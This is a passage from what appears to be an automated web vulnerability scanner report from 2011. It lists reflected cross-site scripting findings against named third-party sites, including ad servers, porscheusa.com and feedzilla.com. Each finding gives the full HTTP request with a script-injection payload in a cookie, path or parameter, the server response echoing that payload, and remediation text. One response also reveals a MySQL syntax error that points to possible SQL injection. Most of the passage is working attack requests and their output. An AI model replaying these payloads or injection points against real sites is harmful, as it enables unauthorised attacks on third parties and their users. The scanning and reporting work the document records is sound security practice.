Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 214
Date: Thu, 03 Feb 2011 18:54:52 GMT
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2549
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:10:02 GMT
Connection: close
Content-Length: 2537
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19
The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:19 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly
Content-Length: 2946
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:15:05 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2"> ...[SNIP]...
1.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://porscheusa.com
Path: /911GTS-mosaic
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:14:56 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Moved Temporarily</TITLE> </HEAD><BODY> <H1>Moved Temporarily</H1> The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1"> ...[SNIP]...
The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1
Host: s1.srtk.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:23:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT"
Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/
location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263
Content-Length: 362
Connection: close
Content-Type: application/x-javascript
SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script> ...[SNIP]...
The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:42 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352
<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business&subcategory_name=mortgage2c5e4"><script>alert(1)</script>e49c418b94f&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4df"><script>alert(1)</script>de2ee12f61a was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /rss/flash_feed.asp?cat=business3b4df"><script>alert(1)</script>de2ee12f61a&Cat2=mortgage HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCDCDQCR=EBONDDMACNKMJCOEBLEAOEIL
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:02:41 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Location: http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352
<html><head><title>Object Moved</title></head><body><h1>Object moved</h1><br>The object can be found <a href="http://api.feedzilla.com/v1/articles.rss?category_name=business3b4df"><script>alert(1)</script>de2ee12f61a&subcategory_name=mortgage&title_only=1&embed_source_in_title=0&embed_sharing_links=0&client_source=FLASH_WIDGET"> ...[SNIP]...